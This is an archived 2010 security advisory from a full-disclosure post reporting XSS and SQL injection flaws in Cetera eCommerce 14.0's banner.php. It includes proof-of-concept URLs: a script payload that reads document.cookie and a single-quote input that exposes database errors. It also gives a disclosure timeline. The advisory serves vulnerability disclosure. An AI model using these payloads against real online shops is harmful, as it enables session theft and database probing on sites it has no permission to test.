Cetera eCommerce 14.0 SQL Injection / Cross Site Scripting

2010-12-13T00:00:00
ID PACKETSTORM:96659
Type packetstorm
Reporter MustLive
Modified 2010-12-13T00:00:00

Description

                                        
                                            `Hello Full-Disclosure!  
  
I want to warn you about new security vulnerabilities in Cetera eCommerce.  
It's engine for online shops.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are Cetera eCommerce 14.0 and previous versions.  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
http://site/cms/templates/banner.php?bannerId=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
SQL DB Structure Extraction (WASC-13):  
  
http://site/cms/templates/banner.php?bannerId=’  
  
------------  
Timeline:  
------------  
  
2010.10.01 - announced at my site.  
2010.10.02 - informed developers.  
2010.12.11 - disclosed at my site.  
  
I mentioned about these vulnerabilities at my site  
(http://websecurity.com.ua/4578/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
  
  
`